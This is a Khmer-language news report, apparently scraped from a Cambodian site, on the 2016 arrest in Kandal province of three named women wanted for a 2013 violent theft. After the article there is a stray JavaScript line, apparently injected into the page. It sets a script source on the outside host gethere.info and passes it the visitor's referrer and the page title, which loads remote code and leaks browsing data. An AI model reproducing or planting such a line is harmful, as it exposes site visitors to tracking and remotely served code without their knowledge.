ឃាត់ខ្លួនមនុស្សស្រី៣នាក់​ ពីបទលួចមានស្ថានទម្ងន់ទោស(ដោយសារប្រព្រឹត្តអំពើហិង្សា)

កណ្តាល ៖ ជនសង្ស័យចំនួន៣នាក់ ត្រូវបានកម្លាំងនគរបាលយុត្តិធម៌ ស្រុកអង្គស្នួល ធ្វើការឃាត់ខ្លួនកាលពីវេលាម៉ោង ១០និង៣០នាទីព្រឹក ថ្ងៃទី១៥ខែកញ្ញា ឆ្នាំ២០១៦ ស្ថិតនៅចំណុចនៅស្រុកអង្គស្នួល ខេត្តកណ្តាល។

សមត្ថកិច្ចបានឲ្យដឹងថា ជនសង្ស័យដែលស្រាវជ្រាវ និងចាប់ឃាត់ខ្លួនបាននោះ គឺដោយសារតែមានដីកាបង្គាប់លេខ ០៩២/ ០៩៤/០៩៥/ ដ ច ខ .ចុះថ្ងៃទី២៨ខែមករាឆ្នាំ២០១៥ របស់លោកគឹម ម៉េង ចៅក្រមស៊ើបសួរសាលាដំបូងខេត្តកណ្តាល។

ក្រោយពីអធិការដ្ឋាន បានទទួលដីកានោះហើយ បានបញ្ជាកម្លាំងក្នុងមូលដ្ឋានទាំងអស់អោយធ្វើការស្រាវជ្រាវ និងឃាត់ខ្លួន ជនសង្ស័យយកមក អនុវត្តទោស តាមដីកា។ ជនដែលត្រូវបានឃាត់ខ្លួននោះទី១ឈ្មោះប៉ាង ស្រីម៉ុល ភេទស្រីអាយុ ២០ឆ្នាំជន ជាតិខ្មែរ មុខរបរកម្មករ រោងចក្រ ។២-ឈ្មោះប៉ាង ស្រីម៉ុចហៅភួង ស្រីនាងភេទស្រីអាយុ២៣ឆ្នាំជនជាតិខ្មែរ មុខរបរ កម្មករ រោងចក្រ ។៣-ឈ្មោះ ប៉ុល ស្រីម៉ាច ភេទស្រីអាយុ៤៥ឆ្នាំ ជនជាតិខ្មែរ មុខរបរកម្មករ ទាំង៣នាក់នៅភូមិព្រៃក្ដីឃុំស្វាយក្រវ៉ាន់ស្រុកច្បារមនខេត្តកំពង់ស្ពឺ ។ ជាប់ចោទពីបទ លួចមានស្ថានទម្ងន់ទោស(ដោយសារប្រព្រឹត្តអំពើហិង្សា)ប្រព្រឹត្តនៅភូមិត្រយឹងឃុំពើក ស្រុកអង្គស្នូលខេត្តកណ្តាលកាលពីថ្ងៃទី១៨ ខែឧសភា ឆ្នាំ២០១៣។

បច្ចុប្បន្នជនសង្ស័យខាងលើ ត្រូវបានកម្លាំងសមត្ថកិច្ចចាប់បញ្ជូនខ្លួនទៅឃុំជាបណ្តោះអាសន្ននៅអធិការដ្ឋាន ដើម្បីកសាងសំណុំរឿង បញ្ជូនទៅកាន់តុលាការចចាត់ការតាមនីតិវិធីច្បាប់ ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More